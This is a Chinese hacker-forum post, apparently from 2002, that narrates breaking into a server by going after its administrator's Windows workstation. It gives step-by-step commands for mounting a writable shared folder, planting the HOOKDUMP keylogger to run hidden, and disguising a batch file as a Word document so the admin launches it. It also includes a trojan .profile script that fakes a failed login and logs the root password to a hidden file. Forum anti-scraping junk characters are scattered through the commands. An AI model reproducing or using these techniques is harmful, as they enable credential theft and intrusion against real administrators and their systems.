找回密码
 注册

QQ登录

只需一步,快速开始

查看: 4205|回复: 0

一种奇特的入侵方式

[复制链接]
发表于 2002-1-28 04:21:47 | 显示全部楼层 |阅读模式
一种奇特的入侵方式) I: Q# e/ Q4 n9 @9 q4 l
# c8 u7 `4 r6 J9 R' ~) k8 G
     我这次谈一种很奇特的入侵主机的方法,这种方法目前咱还没在什么书籍上看过,我要申请专利的哟。
; n$ }! }. F; R0 Y/ b9 [4 Y    Once upon a time,我发现了一个网站,于是常规入侵。很好,它的FINGER开着,于是我编了一个SHELL,从aaa帐号试到zzz(bye the way,这是我发现的一个网上规律,那就是帐号的长度与口令的强度成正比,如果一个帐号只有两三位长,那它的口令一般也很简单,反之亦然,故且称之为若氏定理吧),结果一个帐号也不存在,我没有再试它的帐号。因为我被它开的端口吸引住了,它开着WWW,我就不信它不出错。一连拿了五种CGI和WWW扫描器总计扫了三四百种常见错误它几乎都不存在,我KAO,I服了YOU!也有几个错误,我不知道如何利用,算了。又绕着主机转了几圈,象狐狸遇见刺猬,无从下嘴。/ g8 |) v; D! T3 R" k6 K3 ]4 P
    还是看看root的信息吧:finger root@xxx.xxx.xxx
7 k2 p6 _; C' K; q, C1 T) r1 x0 pLogin name: root                        In real life: system PRIVILEGED account0 k. y4 o  L; o7 a" t9 ~. s
Directory: /                            Shell: /bin/sh' A: s0 m4 H9 \. U5 L5 W$ C
Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx
- k9 B5 y/ a, gNo Plan.4 w$ c6 ]7 C+ R. F
    root经常来,那个202.xx.xx.xx就是他用的工作站了,从那会不会看到点东西呢?* ]  ?$ l2 a' O9 D9 e2 i
    net view \\202.xx.xx.xx9 \6 t2 A% h! b- J* X1 r- B
Shared resources at \\202.xx.xx.xx
- Z& z& O( }/ |% [Sharename    Type         Comment" y6 D, q3 h& n* N! x- R* a' v
x1 p+ w& O/ u1 o  z, S6 `
x
- E* h# v: ~: d8 @* q我的公文包   Disk         
) q8 {4 K8 g8 b: S3 Y" HThe command was completed successfully.
( Z$ s1 O* a! W3 }0 A' D0 ]% R    在上网的机器上开着WINDOWS的“文件和打印机共享”的服务,是很多人容易掉以轻心的,这个root没有例外。如果它的C盘共享了而且可写那就好了,但那是做梦,现在开了共享的目录没有一个是根目录,连D驱的都没有,别着急,慢慢来。x掉的那些文件夹都没用,不能写,里面尽是些英文原著,这个root还挺行的。“我的公文包”吸引了我的注意,这是一个用于将不同的机器上的资料进行同步的工具,很显然这个root要经常更新主机上的主页,有时候在自己的机器上编,有时候在主机上编……所以很重要的一点:“我的公文包”的共享一般都是可写的!$ w+ v: Y- R7 A; }' X6 C3 I, ]
    那我再进去看看。
* T5 I! P0 r2 T# U* u/ n) e7 p    >net use i: \\202.xx.xx.xx
5 ?- J: i, o' m1 c% L4 \1 ^' Y    >i:
0 m, A/ i) L( C; }% q& ]0 B$ b% P    >echo asdf>temp.txt
& [# z# C& ~/ f0 ~+ K不错,确实可写& O: P2 z; ]+ I* g6 R" N3 ?* a
    >del temp.txt, k0 f7 ], h2 b% g# K
不留痕迹——黑客的习惯7 d" x6 i: X+ W: {2 Q- f4 H' J
    >dir/od/p9 F/ y! H9 D- C9 F  M' ~& g% ~
看看都有些什么……倒数第二排那个是什么?“X月工作计划.doc”!就是它了,即然是计划就不可能写完了就丢一边,它肯定会再次打开它的——至少下个月写计划时要COPY一下:->
+ r' ?* e! J! l. t  q: r8 H    该动手了,我的目标就是让它下次打开时误中我的陷阱而运行我藏的木马。我这次用的是一个键盘计录软件HOOKDUMP,我觉得它挺好的,价钱实惠,量也足……对不起,说习惯了,应该是它不仅记录下全部击键,还记录下打开或关掉了什么程序、按过什么按纽、用过什么菜单……总之,它的记录让你就和你站在他身后看他操作计算机一样详细了。您要问那么多木马你为啥装这个?要知道无论是中国的冰河、netspy还是外国的netbus、BO,都被各种杀毒软件列为头号侦查对象,而一个root的机器上可不可能没装杀毒软件?还是HOOKDUMP好,小小的,不起眼,不过如果大家都用只怕我再用它的机会就少了……
9 p  c# J! T' w    >copy hookdump.* i:
9 x5 e" V$ ?  [( e7 U  u4 D    补充一点:上传前先编好它的hookdump.ini文件,置为隐藏方式运行,不然root一运行屏幕上蹦出一大窗口可就溴大了。
# ~, b" Y' o, O    然后再在自己的机器上编一个同名的BAT文件:X月工作计划.BAT
2 J  S" S# W* a# a/ j$ @    >edit c:\X月工作计划.BAT9 O/ {) g! N  e; k, V
@echo off* U! [# B$ F) _# Z# m* {# `  e
hookdump
, G. R- ^: x( @% W/ {attrib -h X月工作计划.doc% k; ?) p( V3 `3 c% ^
c:\progra~1\micros~1\office\winword X月工作计划.doc
! K  Z1 G. B) dattrib -h temp.bat
& b$ }3 T% X* m6 o0 ]2 q% Mdel temp.pif
1 K. g) l, g3 \& e' |2 f7 f: Sdel temp.bat
, Z( F  x" R! f    看明白了吧?root运行了这个BAT文件实际上就是先运行木马,再调用WINWORD文件打开它想开的这个文件,然后自我删除,也许它机器上WINWORD的位置不同,那调用就会失败,不过不要紧,反正BAT会马上删除,他会以为是自己的误操作。# t9 H% H, L* V5 a
    这时你的C驱根目录就有了这么一个BAT文件,它是一个方形的图标,和那个WORD文件大相径庭,root怎么会运行它呢?没关系,在这个文件上点右键,点属性,在“程序”栏选“更改图标”不就行了吗?WORD的图标在你机器c:\progra~1\micros~1\offic中。还要将“运行”改为“最小化”,“退出时关闭”打上勾,这样才能保证在运行时一点迹象也没有。事实上这个BAT文件变成了两个,还有一个PIF文件就是它的图标。
4 U7 B8 i0 t. ]  ?6 G, S    把这两个文件传上去:
$ n5 T0 c: P6 ?; ~8 Z/ V8 f9 ~! _9 Y    >copy X月工作计划.bat i:
4 {5 a% Y/ M4 a% H4 S1 i) I    >copy X月工作计划.pif i:% `2 D  h3 P0 l. x* N5 ~( D% u
    然后把它的文件和自己的文件都藏起来:
$ ~3 e6 R! ]1 q    >attrib +h X月工作计划.doc
0 X' w' h; B5 j    >attrib +h X月工作计划.bat
; Z/ Y2 u5 A" y) ~    这样,root的“公文包”里只剩下一个和原来一模一样的WORD图标,他做梦也没想到这已变成了一个BAT文件。然后可以喘口气了,让我们静静的等……
1 B; g+ q$ Y3 H" j% c# E7 N- ^4 u- S! y: x  k
    几天后,我进入这个工作站,取下记录下来的击键记录,找出root的口令,进入主机。
6 R8 A. V# M; g2 e/ Y------------------------------------------------------
2 R/ L3 h5 k1 F: J/ |4 J9 R    看明白了吗?这种入侵方法就是对那些铜墙铁壁的主机不是强往里冲而是查操作该主机的root所使用的机器,那是他的“座机”,“舒适”才是他想要的,因此强度也就大大减小。进入他的“座机”后跟踪他的操作,不就轻易的获得钥匙了吗?顺便说一下,其实那个“我的公文包”文件夹的共享是加了口令的,我另费了一番周折才进去,不过这和入侵方式无关,我下回再讲怎么进有口令的共享文件夹。
; a$ _8 G+ _1 e6 U' v    好了,看在我敲得手指发麻的份上,您也该回答我一个问题了:
% O6 c' t. q) Y. a  ?    条件:已获得某主机的rootshell,假设名为.fool (-rwsr-xr-x 1 root system 131072 .fool)
3 O% M# [4 ?5 h) ~) V1 L$ s    目标:获得该主机root的帐号* C2 I" D8 b* k
    提示:方法一:即然已是root,可以装一个sniffer,嗅探口令,不过主机是Digital 4.0B,常见的esniff,dsniff,sniffit都不能运行,你再推荐一个?
/ u# K! v7 M5 F7 H7 ?; [9 X          方法二:做一个假LOGIN的SHELL,将原LOGIN程序改名,收集了帐号的口令后调用真的LOGIN程序,但我发现LOGIN程序一旦改名就不能运行了!, v( o/ J2 D9 V. H2 U
          方法三:在root的HOME目录中改它的.profile如下:3 f& [) j3 _4 y0 x, j
clear4 l6 b+ i: _* Q0 S
echo
* _0 ]3 m3 i* Q& ?# recho
7 a9 p2 t9 Y* X& u4 ^echo "Digital UNIX (lwh000) (ttyp0)"4 l4 y3 b$ T. ^! G  U
echo; B! V) l/ D. y( \1 \0 y
echo "login:root"
  E' M8 C: h6 V- L* E8 secho "Password:"6 d7 d% y0 Z5 g# P, }
echo "Login incorrect". O- h& X5 ]5 i* h
echo "login:\c"
& z! n1 N8 r. N$ D! bread lgin8 P* a* F& t5 M/ x) H  E- @
stty -echo
, x7 C! Q. k. M/ n* a  Pecho "Password:\c"
- N/ t' s. V1 q0 b+ P. ]read pw; Y9 m' m, S; \. J5 p- [- c
stty echo
6 v$ M; y/ p9 l5 D6 [echo "Login:$lgin - Pword:$pw" >>/tmp/.autobk' w+ a- s7 m2 _
echo # i1 L  D1 g( z2 R* T/ w+ v, G* B
echo "Last login: Tue Jul 18 11:05:25 from pa1002"
+ }% R9 F" ]9 }, B8 t2 j1 y6 Pecho
* f" _. t2 g5 [" I& Necho "Digital UNIX V4.0B  (Rev. 564); Sat Mar 18 11:02:04 CST 2000"
2 p* w. b! M  r, R# 中间这一段太长,就不写了,实际上就是伪装主机的欢迎词2 M6 x. m. B$ q  [( x/ u! H" C* |
echo  ; m; ^8 C6 \2 j: q
echo, a6 L* G' }8 j# m! N$ N
# 这以下是root的原.profile# J( ]$ n+ T/ D
PATH=$HOME/bin:${PATH:-/usr/bin:.}
+ A: a+ B4 Y9 I9 }5 `, n# Mexport PATH
/ E% [# Z* S2 ?+ Oif [ ! "$DT" ]; then
& Q* U( F! V4 Rstty dec
6 \# m( [- e0 mtset -I -Q; u: Y8 y6 p7 N, E6 m& n& l: y
fi
- |" c6 I! X6 A  v6 l+ j( v7 O    看出来没,实际上root正确登录后,第一句clear擦掉欢迎词,然后伪写登录不成功,让他再输一次,然后记录下来,再伪写上欢迎词,执行正常的.profile内容。
9 m& L+ x  p6 Z5 w1 \" u6 ~1 l% Q    但是TELNET反应是较慢的,第一句clear再快也能看出屏幕有一个闪烁,细心的root也许会留意,如果能关掉UNIX的欢迎词就好了,怎么做?
0 `* v6 n+ w# H   
*滑块验证:
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|小黑屋|宽带技术网 |网站地图 粤公网安备44152102000001号

GMT+8, 2025-5-2 01:58 , Processed in 0.044854 second(s), 4 queries , Redis On.

Powered by Discuz! X3.5 Licensed

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表